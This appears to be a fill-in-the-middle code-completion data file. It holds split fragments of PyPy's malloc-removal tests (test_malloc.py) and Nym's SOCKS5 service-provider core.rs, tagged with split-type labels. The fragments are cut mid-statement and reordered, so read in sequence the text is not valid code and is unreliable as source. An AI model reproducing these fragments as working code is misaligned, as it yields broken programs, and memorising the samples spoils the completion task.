backend_optimizations(t)
op = graph.startblock.exits[0].target.exits[1].target.operations[0]
assert op.opname == "malloc"
def test_wrapper_cannot_be_removed(self):
SMALL = lltype.OpaqueType('SMALL')
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def g(small):
return -1
def fn():
b = lltype.malloc(BIG)
g(b.s)
self.check(fn, [], [], None, must_be_removed=False)
def test_direct_fieldptr(self):
S = lltype.GcStruct('S', ('x', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 11
p = lltype.direct_fieldptr(s, 'x')
return p[0]
self.check(fn, [], [], 11)
def test_direct_fieldptr_2(self):
T = lltype.GcStruct('T', ('z', lltype.Signed))
S = lltype.GcStruct('S', ('t', T),
('x', lltype.Signed),
('y', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 10
s.t.z = 1
px = lltype.direct_fieldptr(s, 'x')
py = lltype.direct_fieldptr(s, 'y')
pz = lltype.direct_fieldptr(s.t, 'z')
py[0] = 31
return px[0] + s.y + pz[0]
self.check(fn, [], [], 42)
def test_getarraysubstruct(self):
py.test.skip("fails because of the interior structure changes")
U = lltype.Struct('U', ('n', lltype.Signed))
for length in [1, 2]:
S = lltype.GcStruct('S', ('a', lltype.FixedSizeArray(U, length)))
for index in range(length):
def fn():
s = lltype.malloc(S)
s.a[index].n = 12
return s.a[index].n
self.check(fn, [], [], 12)
def test_ptr_nonzero(self):
S = lltype.GcStruct('S')
def fn():
s = lltype.malloc(S)
return bool(s)
self.check(fn, [], [], True)
def test_substruct_not_accessed(self):
SMALL = lltype.Struct('SMALL', ('x', lltype.Signed))
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def fn():
x = lltype.malloc(BIG)
while x.z < 10: # makes several blocks
x.z += 3
return x.z
self.check(fn, [], [], 12)
def test_union(self):
py.test.skip("fails because of the interior structure changes")
UNION = lltype.Struct('UNION', ('a', lltype.Signed), ('b', lltype.Signed),
hints = {'union': True})
BIG = lltype.GcStruct('BIG', ('u1', UNION), ('u2', UNION))
def fn():
x = lltype.malloc(BIG)
x.u1.a = 3
x.u2.b = 6
return x.u1.b * x.u2.a
self.check(fn, [], [], Ellipsis)
def test_keep_all_keepalives(self):
SIZE = llmemory.sizeof(lltype.Signed)
PARRAY = lltype.Ptr(lltype.FixedSizeArray(lltype.Signed, 1))
class A:
def __init__(self):
self.addr = llmemory.raw_malloc(SIZE)
def __del__(self):
llmemory.raw_free(self.addr)
class B:
pass
def myfunc():
b = B()
b.keep = A()
b.data = llmemory.cast_adr_to_ptr(b.keep.addr, PARRAY)
b.data[0] = 42
ptr = b.data
# normally 'b' could go away as early as here, which would free
# the memory held by the instance of A in b.keep...
res = ptr[0]
# ...so we explicitly keep 'b' alive until here
objectmodel.keepalive_until_here(b)
return res
graph = self.check(myfunc, [], [], 42,
must_be_removed=False) # '
|
pass
|
identifier_body
|
test_malloc.py
|
from rpython.conftest import option
class TestMallocRemoval(object):
MallocRemover = LLTypeMallocRemover
def check_malloc_removed(cls, graph):
remover = cls.MallocRemover()
checkgraph(graph)
count1 = count2 = 0
for node in graph.iterblocks():
for op in node.operations:
if op.opname == cls.MallocRemover.MALLOC_OP:
S = op.args[0].value
if not remover.union_wrapper(S): # union wrappers are fine
count1 += 1
if op.opname in ('direct_call', 'indirect_call'):
count2 += 1
assert count1 == 0 # number of mallocs left
assert count2 == 0 # number of calls left
check_malloc_removed = classmethod(check_malloc_removed)
def check(self, fn, signature, args, expected_result, must_be_removed=True,
inline=None):
remover = self.MallocRemover()
t = TranslationContext()
t.buildannotator().build_types(fn, signature)
t.buildrtyper().specialize()
graph = graphof(t, fn)
if inline is not None:
from rpython.translator.backendopt.inline import auto_inline_graphs
auto_inline_graphs(t, t.graphs, inline)
if option.view:
t.view()
# to detect broken intermediate graphs,
# we do the loop ourselves instead of calling remove_simple_mallocs()
while True:
progress = remover.remove_mallocs_once(graph)
simplify.transform_dead_op_vars_in_blocks(list(graph.iterblocks()),
[graph])
if progress and option.view:
t.view()
if expected_result is not Ellipsis:
interp = LLInterpreter(t.rtyper)
res = interp.eval_graph(graph, args)
assert res == expected_result
if not progress:
break
if must_be_removed:
self.check_malloc_removed(graph)
return graph
def test_fn1(self):
def fn1(x, y):
if x > 0:
t = x+y, x-y
else:
t = x-y, x+y
s, d = t
return s*d
self.check(fn1, [int, int], [15, 10], 125)
def test_fn2(self):
class T:
pass
def fn2(x, y):
t = T()
t.x = x
t.y = y
if x > 0:
return t.x + t.y
else:
return t.x - t.y
self.check(fn2, [int, int], [-6, 7], -13)
def test_fn3(self):
def fn3(x):
a, ((b, c), d, e) = x+1, ((x+2, x+3), x+4, x+5)
return a+b+c+d+e
self.check(fn3, [int], [10], 65)
def test_fn4(self):
class A:
pass
class B(A):
pass
def fn4(i):
a = A()
b = B()
a.b = b
b.i = i
return a.b.i
self.check(fn4, [int], [42], 42)
def test_fn5(self):
class A:
attr = 666
class B(A):
attr = 42
def fn5():
b = B()
return b.attr
self.check(fn5, [], [], 42)
def test_aliasing(self):
class A:
pass
def fn6(n):
a1 = A()
a1.x = 5
a2 = A()
a2.x = 6
if n > 0:
a = a1
else:
a = a2
a.x = 12
return a1.x
self.check(fn6, [int], [1], 12, must_be_removed=False)
def test_bogus_cast_pointer(self):
class S:
pass
class T(S):
def f(self):
self.y += 1
def f(x):
T().y = 5
s = S()
s.x = 123
if x < 0:
s.f()
return s.x
graph = self.check(f, [int], [5], 123, inline=20)
found_operations = {}
for block in graph.iterblocks():
for op in block.operations:
found_operations[op.opname] = True
assert 'debug_fatalerror' in found_operations
def test_dont_remove_with__del__(self):
import os
delcalls = [0]
class A(object):
nextid = 0
def __init__(self):
self.id = self.nextid
self.nextid += 1
def __del__(self):
delcalls[0] += 1
#os.write(1, "__del__\n")
def f(x=int):
a = A()
i = 0
while i < x:
a = A()
os.write(1, str(delcalls[0]) + "\n")
i += 1
return 1
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
graph = graphof(t, f)
backend_optimizations(t)
op = graph.startblock.exits[0].target.exits[1].target.operations[0]
assert op.opname == "malloc"
def test_wrapper_cannot_be_removed(self):
SMALL = lltype.OpaqueType('SMALL')
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def g(small):
return -1
def fn():
b = lltype.malloc(BIG)
g(b.s)
self.check(fn, [], [], None, must_be_removed=False)
def test_direct_fieldptr(self):
S = lltype.GcStruct('S', ('x', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 11
p = lltype.direct_fieldptr(s, 'x')
return p[0]
self.check(fn, [], [], 11)
def test_direct_fieldptr_2(self):
T = lltype.GcStruct('T', ('z', lltype.Signed))
S = lltype.GcStruct('S', ('t', T),
('x', lltype.Signed),
('y', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 10
s.t.z = 1
px = lltype.direct_fieldptr(s, 'x')
py = lltype.direct_fieldptr(s, 'y')
pz = lltype.direct_fieldptr(s.t, 'z')
py[0] = 31
return px[0] + s.y + pz[0]
self.check(fn, [], [], 42)
def test_getarraysubstruct(self):
py.test.skip("fails because of the interior structure changes")
U = lltype.Struct('U', ('n', lltype.Signed))
for length in [1, 2]:
S = lltype.GcStruct('S', ('a', lltype.FixedSizeArray(U, length)))
for index in range(length):
def fn():
s = lltype.malloc(S)
s.a[index].n = 12
return s.a[index].n
self.check(fn, [], [], 12)
def test_ptr_nonzero(self):
S = lltype.GcStruct('S')
def fn():
s = lltype.malloc(S)
return bool(s)
self.check(fn, [], [], True)
def test_substruct_not_accessed(self):
SMALL = lltype.Struct('SMALL', ('x', lltype.Signed))
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def fn():
x = lltype.malloc(BIG)
while x.z < 10: # makes several blocks
x.z += 3
return x.z
self.check(fn, [], [], 12)
def test_union(self):
py.test.skip("fails because of the interior structure changes")
UNION = lltype.Struct('UNION', ('a', lltype.Signed), ('b', lltype.Signed),
hints = {'union': True})
BIG = lltype.GcStruct('BIG', ('u1', UNION), ('u2', UNION))
def fn():
x = lltype.malloc(BIG)
x.u1.a = 3
x.u2.b = 6
return x.u1.b * x.u2.a
self.check(fn, [], [], Ellipsis)
def test_keep_all_keepalives(self):
SIZE = llmemory.sizeof(lltype.Signed)
PARRAY = lltype.Ptr(lltype.FixedSizeArray(lltype.Signed, 1))
class A:
def __init__(self):
|
random_line_split
|
||
test_malloc.py
|
check_malloc_removed = classmethod(check_malloc_removed)
def check(self, fn, signature, args, expected_result, must_be_removed=True,
inline=None):
remover = self.MallocRemover()
t = TranslationContext()
t.buildannotator().build_types(fn, signature)
t.buildrtyper().specialize()
graph = graphof(t, fn)
if inline is not None:
from rpython.translator.backendopt.inline import auto_inline_graphs
auto_inline_graphs(t, t.graphs, inline)
if option.view:
t.view()
# to detect broken intermediate graphs,
# we do the loop ourselves instead of calling remove_simple_mallocs()
while True:
progress = remover.remove_mallocs_once(graph)
simplify.transform_dead_op_vars_in_blocks(list(graph.iterblocks()),
[graph])
if progress and option.view:
t.view()
if expected_result is not Ellipsis:
interp = LLInterpreter(t.rtyper)
res = interp.eval_graph(graph, args)
assert res == expected_result
if not progress:
break
if must_be_removed:
self.check_malloc_removed(graph)
return graph
def test_fn1(self):
def fn1(x, y):
if x > 0:
t = x+y, x-y
else:
|
s, d = t
return s*d
self.check(fn1, [int, int], [15, 10], 125)
def test_fn2(self):
class T:
pass
def fn2(x, y):
t = T()
t.x = x
t.y = y
if x > 0:
return t.x + t.y
else:
return t.x - t.y
self.check(fn2, [int, int], [-6, 7], -13)
def test_fn3(self):
def fn3(x):
a, ((b, c), d, e) = x+1, ((x+2, x+3), x+4, x+5)
return a+b+c+d+e
self.check(fn3, [int], [10], 65)
def test_fn4(self):
class A:
pass
class B(A):
pass
def fn4(i):
a = A()
b = B()
a.b = b
b.i = i
return a.b.i
self.check(fn4, [int], [42], 42)
def test_fn5(self):
class A:
attr = 666
class B(A):
attr = 42
def fn5():
b = B()
return b.attr
self.check(fn5, [], [], 42)
def test_aliasing(self):
class A:
pass
def fn6(n):
a1 = A()
a1.x = 5
a2 = A()
a2.x = 6
if n > 0:
a = a1
else:
a = a2
a.x = 12
return a1.x
self.check(fn6, [int], [1], 12, must_be_removed=False)
def test_bogus_cast_pointer(self):
class S:
pass
class T(S):
def f(self):
self.y += 1
def f(x):
T().y = 5
s = S()
s.x = 123
if x < 0:
s.f()
return s.x
graph = self.check(f, [int], [5], 123, inline=20)
found_operations = {}
for block in graph.iterblocks():
for op in block.operations:
found_operations[op.opname] = True
assert 'debug_fatalerror' in found_operations
def test_dont_remove_with__del__(self):
import os
delcalls = [0]
class A(object):
nextid = 0
def __init__(self):
self.id = self.nextid
self.nextid += 1
def __del__(self):
delcalls[0] += 1
#os.write(1, "__del__\n")
def f(x=int):
a = A()
i = 0
while i < x:
a = A()
os.write(1, str(delcalls[0]) + "\n")
i += 1
return 1
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
graph = graphof(t, f)
backend_optimizations(t)
op = graph.startblock.exits[0].target.exits[1].target.operations[0]
assert op.opname == "malloc"
def test_wrapper_cannot_be_removed(self):
SMALL = lltype.OpaqueType('SMALL')
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def g(small):
return -1
def fn():
b = lltype.malloc(BIG)
g(b.s)
self.check(fn, [], [], None, must_be_removed=False)
def test_direct_fieldptr(self):
S = lltype.GcStruct('S', ('x', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 11
p = lltype.direct_fieldptr(s, 'x')
return p[0]
self.check(fn, [], [], 11)
def test_direct_fieldptr_2(self):
T = lltype.GcStruct('T', ('z', lltype.Signed))
S = lltype.GcStruct('S', ('t', T),
('x', lltype.Signed),
('y', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 10
s.t.z = 1
px = lltype.direct_fieldptr(s, 'x')
py = lltype.direct_fieldptr(s, 'y')
pz = lltype.direct_fieldptr(s.t, 'z')
py[0] = 31
return px[0] + s.y + pz[0]
self.check(fn, [], [], 42)
def test_getarraysubstruct(self):
py.test.skip("fails because of the interior structure changes")
U = lltype.Struct('U', ('n', lltype.Signed))
for length in [1, 2]:
S = lltype.GcStruct('S', ('a', lltype.FixedSizeArray(U, length)))
for index in range(length):
def fn():
s = lltype.malloc(S)
s.a[index].n = 12
return s.a[index].n
self.check(fn, [], [], 12)
def test_ptr_nonzero(self):
S = lltype.GcStruct('S')
def fn():
s = lltype.malloc(S)
return bool(s)
self.check(fn, [], [], True)
def test_substruct_not_accessed(self):
SMALL = lltype.Struct('SMALL', ('x', lltype.Signed))
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def fn():
x = lltype.malloc(BIG)
while x.z < 10: # makes several blocks
x.z += 3
return x.z
self.check(fn, [], [], 12)
def test_union(self):
py.test.skip("fails because of the interior structure changes")
UNION = lltype.Struct('UNION', ('a', lltype.Signed), ('b', lltype.Signed),
hints = {'union': True})
BIG = lltype.GcStruct('BIG', ('u1', UNION), ('u2', UNION))
def fn():
x = lltype.malloc(BIG)
x.u1.a = 3
x.u2.b = 6
return x.u1.b * x.u2.a
self.check(fn, [], [], Ellipsis)
def test_keep_all_keepalives(self):
SIZE = llmemory.sizeof(lltype.Signed)
PARRAY = lltype.Ptr(lltype.FixedSizeArray(lltype.Signed, 1))
class A:
def __init__(self):
self.addr = llmemory.raw_malloc(SIZE)
def __del__(self):
llmemory.raw_free(self.addr)
class B:
pass
def myfunc():
b = B()
b.keep = A()
b.data = llmemory.cast_adr_to_ptr(b.keep.addr, PARRAY)
b.data[0] = 42
ptr = b.data
# normally 'b' could go away as early as here, which would free
# the memory held by the instance of A in b.keep...
res = ptr[0]
# ...so we explicitly keep 'b' alive until here
objectmodel.keepalive_until_here(b)
return res
graph = self.check(myfunc, [], [], 42,
must_be_removed=False) # '
|
t = x-y, x+y
|
conditional_block
|
core.rs
|
Technologies SA <contact@nymtech.net>
// SPDX-License-Identifier: Apache-2.0
use crate::allowed_hosts::{HostsStore, OutboundRequestFilter};
use crate::connection::Connection;
use crate::websocket;
use crate::websocket::TSWebsocketStream;
use futures::channel::mpsc;
use futures::stream::{SplitSink, SplitStream};
use futures::{SinkExt, StreamExt};
use log::*;
use nymsphinx::addressing::clients::Recipient;
use nymsphinx::receiver::ReconstructedMessage;
use proxy_helpers::connection_controller::{Controller, ControllerCommand, ControllerSender};
use socks5_requests::{ConnectionId, Request, Response};
use std::path::PathBuf;
use std::sync::atomic::{AtomicUsize, Ordering};
use tokio_tungstenite::tungstenite::protocol::Message;
use websocket::WebsocketConnectionError;
use websocket_requests::{requests::ClientRequest, responses::ServerResponse};
// Since it's an atomic, it's safe to be kept static and shared across threads
static ACTIVE_PROXIES: AtomicUsize = AtomicUsize::new(0);
pub struct ServiceProvider {
listening_address: String,
outbound_request_filter: OutboundRequestFilter,
open_proxy: bool,
}
impl ServiceProvider {
pub fn new(listening_address: String, open_proxy: bool) -> ServiceProvider {
let allowed_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("allowed.list"),
);
let unknown_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("unknown.list"),
);
let outbound_request_filter = OutboundRequestFilter::new(allowed_hosts, unknown_hosts);
ServiceProvider {
listening_address,
outbound_request_filter,
open_proxy,
}
}
/// Listens for any messages from `mix_reader` that should be written back to the mix network
/// via the `websocket_writer`.
async fn mixnet_response_listener(
mut websocket_writer: SplitSink<TSWebsocketStream, Message>,
mut mix_reader: mpsc::UnboundedReceiver<(Response, Recipient)>,
) {
// TODO: wire SURBs in here once they're available
while let Some((response, return_address)) = mix_reader.next().await {
// make 'request' to native-websocket client
let response_message = ClientRequest::Send {
recipient: return_address,
message: response.into_bytes(),
with_reply_surb: false,
};
let message = Message::Binary(response_message.serialize());
websocket_writer.send(message).await.unwrap();
}
}
async fn read_websocket_message(
websocket_reader: &mut SplitStream<TSWebsocketStream>,
) -> Option<ReconstructedMessage> {
while let Some(msg) = websocket_reader.next().await {
let data = msg
.expect("we failed to read from the websocket!")
.into_data();
// try to recover the actual message from the mix network...
let deserialized_message = match ServerResponse::deserialize(&data) {
Ok(deserialized) => deserialized,
Err(err) => {
error!(
"Failed to deserialize received websocket message! - {}",
err
);
continue;
}
};
let received = match deserialized_message {
ServerResponse::Received(received) => received,
ServerResponse::Error(err) => {
panic!("received error from native client! - {}", err)
}
_ => unimplemented!("probably should never be reached?"),
};
return Some(received);
}
None
}
async fn start_proxy(
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
controller_sender: ControllerSender,
mix_input_sender: mpsc::UnboundedSender<(Response, Recipient)>,
) {
let mut conn = match Connection::new(conn_id, remote_addr.clone(), return_address).await {
Ok(conn) => conn,
Err(err) => {
error!(
"error while connecting to {:?} ! - {:?}",
remote_addr.clone(),
err
);
// inform the remote that the connection is closed before it even was established
mix_input_sender
.unbounded_send((Response::new(conn_id, Vec::new(), true), return_address))
.unwrap();
return;
}
};
// Connect implies it's a fresh connection - register it with our controller
let (mix_sender, mix_receiver) = mpsc::unbounded();
controller_sender
.unbounded_send(ControllerCommand::Insert(conn_id, mix_sender))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_add(1, Ordering::SeqCst);
info!(
"Starting proxy for {} (currently there are {} proxies being handled)",
remote_addr,
old_count + 1
);
// run the proxy on the connection
conn.run_proxy(mix_receiver, mix_input_sender).await;
// proxy is done - remove the access channel from the controller
controller_sender
.unbounded_send(ControllerCommand::Remove(conn_id))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_sub(1, Ordering::SeqCst);
info!(
"Proxy for {} is finished (currently there are {} proxies being handled)",
remote_addr,
old_count - 1
);
}
fn handle_proxy_connect(
&mut self,
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
) {
if !self.open_proxy && !self.outbound_request_filter.check(&remote_addr) {
log::info!("Domain {:?} failed filter check", remote_addr);
return;
}
let controller_sender_clone = controller_sender.clone();
let mix_input_sender_clone = mix_input_sender.clone();
// and start the proxy for this connection
tokio::spawn(async move {
Self::start_proxy(
conn_id,
remote_addr,
return_address,
controller_sender_clone,
mix_input_sender_clone,
)
.await
});
}
fn handle_proxy_send(
&self,
controller_sender: &mut ControllerSender,
conn_id: ConnectionId,
data: Vec<u8>,
closed: bool,
) {
controller_sender
.unbounded_send(ControllerCommand::Send(conn_id, data, closed))
.unwrap()
}
fn handle_proxy_request(
&mut self,
raw_request: &[u8],
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
) {
// try to treat each received mix message as a service provider request
let deserialized_request = match Request::try_from_bytes(raw_request) {
Ok(request) => request,
Err(err) => {
error!("Failed to deserialized received request! - {}", err);
return;
}
};
match deserialized_request {
Request::Connect {
conn_id,
remote_addr,
return_address,
} => self.handle_proxy_connect(
controller_sender,
mix_input_sender,
conn_id,
remote_addr,
return_address,
),
Request::Send(conn_id, data, closed) => {
self.handle_proxy_send(controller_sender, conn_id, data, closed)
}
}
}
/// Start all subsystems
pub async fn run(&mut self) {
let websocket_stream = self.connect_websocket(&self.listening_address).await;
// split the websocket so that we could read and write from separate threads
let (websocket_writer, mut websocket_reader) = websocket_stream.split();
// channels responsible for managing messages that are to be sent to the mix network. The receiver is
// going to be used by `mixnet_response_listener`
let (mix_input_sender, mix_input_receiver) = mpsc::unbounded::<(Response, Recipient)>();
// controller for managing all active connections
let (mut active_connections_controller, mut controller_sender) = Controller::new();
tokio::spawn(async move {
active_connections_controller.run().await;
});
// start the listener for mix messages
tokio::spawn(async move {
Self::mixnet_response_listener(websocket_writer, mix_input_receiver).await;
});
println!("\nAll systems go. Press CTRL-C to stop the server.");
// for each incoming message from the websocket... (which in 99.99% cases is going to be a mix message)
loop {
let received = match Self::read_websocket_message(&mut websocket_reader).await {
Some(msg) => msg,
None => {
error!("The websocket stream has finished!");
return;
}
};
let raw_message = received.message;
// TODO: here be potential SURB (i.e. received.reply_SURB)
self.handle_proxy_request(&raw_message, &mut controller_sender, &mix_input_sender)
}
}
// Make the websocket connection so we can receive incoming Mixnet messages.
async fn
|
(&self, uri: &str) -> TSWebsocketStream {
let ws_stream = match websocket::Connection::new(uri).connect().await {
Ok(ws_stream) => {
info!("* connected to local websocket server at {}", uri);
ws_stream
}
Err(WebsocketConnectionError::ConnectionNotEstablished) => {
panic!("
|
connect_websocket
|
identifier_name
|
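The wiring in run() above (a spawned task drains a channel toward the websocket while the main loop reads incoming messages and dispatches them to handlers) is a generic fan-in/fan-out pattern. Below is a minimal Python asyncio sketch of the same shape; every name in it (mix_queue, response_listener, read_message, handle_request) is an illustrative stand-in and not part of the Nym codebase.

import asyncio

async def response_listener(mix_queue, websocket_send):
    # Plays the role of mixnet_response_listener: drain queued (response, recipient)
    # pairs and push each one out on the websocket.
    while True:
        response, return_address = await mix_queue.get()
        await websocket_send((return_address, response))

async def run(read_message, handle_request, websocket_send):
    mix_queue = asyncio.Queue()                      # stands in for the unbounded mpsc channel
    asyncio.create_task(response_listener(mix_queue, websocket_send))
    while True:                                      # the read/dispatch loop from run()
        raw = await read_message()
        if raw is None:                              # websocket stream finished
            return
        handle_request(raw, mix_queue)               # handlers reply via mix_queue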
core.rs
|
Technologies SA <contact@nymtech.net>
// SPDX-License-Identifier: Apache-2.0
use crate::allowed_hosts::{HostsStore, OutboundRequestFilter};
use crate::connection::Connection;
use crate::websocket;
use crate::websocket::TSWebsocketStream;
use futures::channel::mpsc;
use futures::stream::{SplitSink, SplitStream};
use futures::{SinkExt, StreamExt};
use log::*;
use nymsphinx::addressing::clients::Recipient;
use nymsphinx::receiver::ReconstructedMessage;
use proxy_helpers::connection_controller::{Controller, ControllerCommand, ControllerSender};
use socks5_requests::{ConnectionId, Request, Response};
use std::path::PathBuf;
use std::sync::atomic::{AtomicUsize, Ordering};
use tokio_tungstenite::tungstenite::protocol::Message;
use websocket::WebsocketConnectionError;
use websocket_requests::{requests::ClientRequest, responses::ServerResponse};
// Since it's an atomic, it's safe to be kept static and shared across threads
static ACTIVE_PROXIES: AtomicUsize = AtomicUsize::new(0);
pub struct ServiceProvider {
listening_address: String,
outbound_request_filter: OutboundRequestFilter,
open_proxy: bool,
}
impl ServiceProvider {
pub fn new(listening_address: String, open_proxy: bool) -> ServiceProvider {
let allowed_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("allowed.list"),
);
let unknown_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("unknown.list"),
);
let outbound_request_filter = OutboundRequestFilter::new(allowed_hosts, unknown_hosts);
ServiceProvider {
listening_address,
outbound_request_filter,
open_proxy,
}
}
/// Listens for any messages from `mix_reader` that should be written back to the mix network
/// via the `websocket_writer`.
async fn mixnet_response_listener(
mut websocket_writer: SplitSink<TSWebsocketStream, Message>,
mut mix_reader: mpsc::UnboundedReceiver<(Response, Recipient)>,
) {
// TODO: wire SURBs in here once they're available
while let Some((response, return_address)) = mix_reader.next().await {
// make 'request' to native-websocket client
let response_message = ClientRequest::Send {
recipient: return_address,
message: response.into_bytes(),
with_reply_surb: false,
};
let message = Message::Binary(response_message.serialize());
websocket_writer.send(message).await.unwrap();
}
}
async fn read_websocket_message(
websocket_reader: &mut SplitStream<TSWebsocketStream>,
) -> Option<ReconstructedMessage> {
while let Some(msg) = websocket_reader.next().await {
let data = msg
.expect("we failed to read from the websocket!")
.into_data();
// try to recover the actual message from the mix network...
let deserialized_message = match ServerResponse::deserialize(&data) {
Ok(deserialized) => deserialized,
Err(err) => {
error!(
"Failed to deserialize received websocket message! - {}",
err
);
continue;
}
};
let received = match deserialized_message {
ServerResponse::Received(received) => received,
ServerResponse::Error(err) => {
panic!("received error from native client! - {}", err)
}
_ => unimplemented!("probably should never be reached?"),
};
return Some(received);
}
None
}
async fn start_proxy(
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
controller_sender: ControllerSender,
mix_input_sender: mpsc::UnboundedSender<(Response, Recipient)>,
) {
let mut conn = match Connection::new(conn_id, remote_addr.clone(), return_address).await {
Ok(conn) => conn,
Err(err) => {
error!(
"error while connecting to {:?} ! - {:?}",
remote_addr.clone(),
err
);
// inform the remote that the connection is closed before it even was established
mix_input_sender
.unbounded_send((Response::new(conn_id, Vec::new(), true), return_address))
.unwrap();
return;
}
};
// Connect implies it's a fresh connection - register it with our controller
let (mix_sender, mix_receiver) = mpsc::unbounded();
controller_sender
.unbounded_send(ControllerCommand::Insert(conn_id, mix_sender))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_add(1, Ordering::SeqCst);
info!(
"Starting proxy for {} (currently there are {} proxies being handled)",
remote_addr,
old_count + 1
);
// run the proxy on the connection
conn.run_proxy(mix_receiver, mix_input_sender).await;
// proxy is done - remove the access channel from the controller
controller_sender
.unbounded_send(ControllerCommand::Remove(conn_id))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_sub(1, Ordering::SeqCst);
info!(
"Proxy for {} is finished (currently there are {} proxies being handled)",
remote_addr,
old_count - 1
);
}
fn handle_proxy_connect(
&mut self,
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
) {
if !self.open_proxy && !self.outbound_request_filter.check(&remote_addr) {
log::info!("Domain {:?} failed filter check", remote_addr);
return;
}
let controller_sender_clone = controller_sender.clone();
let mix_input_sender_clone = mix_input_sender.clone();
// and start the proxy for this connection
tokio::spawn(async move {
Self::start_proxy(
conn_id,
remote_addr,
return_address,
controller_sender_clone,
mix_input_sender_clone,
)
.await
});
}
fn handle_proxy_send(
&self,
controller_sender: &mut ControllerSender,
conn_id: ConnectionId,
data: Vec<u8>,
closed: bool,
) {
controller_sender
.unbounded_send(ControllerCommand::Send(conn_id, data, closed))
.unwrap()
}
fn handle_proxy_request(
&mut self,
raw_request: &[u8],
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
)
|
return_address,
),
Request::Send(conn_id, data, closed) => {
self.handle_proxy_send(controller_sender, conn_id, data, closed)
}
}
}
/// Start all subsystems
pub async fn run(&mut self) {
let websocket_stream = self.connect_websocket(&self.listening_address).await;
// split the websocket so that we could read and write from separate threads
let (websocket_writer, mut websocket_reader) = websocket_stream.split();
// channels responsible for managing messages that are to be sent to the mix network. The receiver is
// going to be used by `mixnet_response_listener`
let (mix_input_sender, mix_input_receiver) = mpsc::unbounded::<(Response, Recipient)>();
// controller for managing all active connections
let (mut active_connections_controller, mut controller_sender) = Controller::new();
tokio::spawn(async move {
active_connections_controller.run().await;
});
// start the listener for mix messages
tokio::spawn(async move {
Self::mixnet_response_listener(websocket_writer, mix_input_receiver).await;
});
println!("\nAll systems go. Press CTRL-C to stop the server.");
// for each incoming message from the websocket... (which in 99.99% cases is going to be a mix message)
loop {
let received = match Self::read_websocket_message(&mut websocket_reader).await {
Some(msg) => msg,
None => {
error!("The websocket stream has finished!");
return;
}
};
let raw_message = received.message;
// TODO: here be potential SURB (i.e. received.reply_SURB)
self.handle_proxy_request(&raw_message, &mut controller_sender, &mix_input_sender)
}
}
// Make the websocket connection so we can receive incoming Mixnet messages.
async fn connect_websocket(&self, uri: &str) -> TSWebsocketStream {
let ws_stream = match websocket::Connection::new(uri).connect().await {
Ok(ws_stream) => {
info!("* connected to local websocket server at {}", uri);
ws_stream
}
Err(WebsocketConnectionError::ConnectionNotEstablished) => {
panic!("
|
{
// try to treat each received mix message as a service provider request
let deserialized_request = match Request::try_from_bytes(raw_request) {
Ok(request) => request,
Err(err) => {
error!("Failed to deserialized received request! - {}", err);
return;
}
};
match deserialized_request {
Request::Connect {
conn_id,
remote_addr,
return_address,
} => self.handle_proxy_connect(
controller_sender,
mix_input_sender,
conn_id,
remote_addr,
|
identifier_body
|
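The constructor above keeps two HostsStore files, allowed.list and unknown.list, and handle_proxy_connect rejects a connection when open_proxy is off and check() fails. The Python sketch below is one plausible reading of that filter (allow hosts on the allow-list, record everything else to the unknown list and reject); the class name, the file handling and the exact check() semantics are assumptions for illustration, not the real OutboundRequestFilter.

from pathlib import Path

class HostFilterSketch:
    # Hypothetical reading of OutboundRequestFilter: allow known hosts, remember the rest.
    def __init__(self, base_dir):
        self.allowed_file = Path(base_dir) / "allowed.list"
        self.unknown_file = Path(base_dir) / "unknown.list"
        self.allowed = set(self.allowed_file.read_text().split()) if self.allowed_file.exists() else set()

    def check(self, remote_addr):
        host = remote_addr.rsplit(":", 1)[0]         # drop an optional port
        if host in self.allowed:
            return True
        with self.unknown_file.open("a") as f:       # keep a record of hosts we refused
            f.write(host + "\n")
        return False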
core.rs
|
Technologies SA <contact@nymtech.net>
// SPDX-License-Identifier: Apache-2.0
use crate::allowed_hosts::{HostsStore, OutboundRequestFilter};
use crate::connection::Connection;
use crate::websocket;
use crate::websocket::TSWebsocketStream;
use futures::channel::mpsc;
use futures::stream::{SplitSink, SplitStream};
use futures::{SinkExt, StreamExt};
use log::*;
use nymsphinx::addressing::clients::Recipient;
use nymsphinx::receiver::ReconstructedMessage;
use proxy_helpers::connection_controller::{Controller, ControllerCommand, ControllerSender};
use socks5_requests::{ConnectionId, Request, Response};
use std::path::PathBuf;
use std::sync::atomic::{AtomicUsize, Ordering};
use tokio_tungstenite::tungstenite::protocol::Message;
use websocket::WebsocketConnectionError;
use websocket_requests::{requests::ClientRequest, responses::ServerResponse};
// Since it's an atomic, it's safe to be kept static and shared across threads
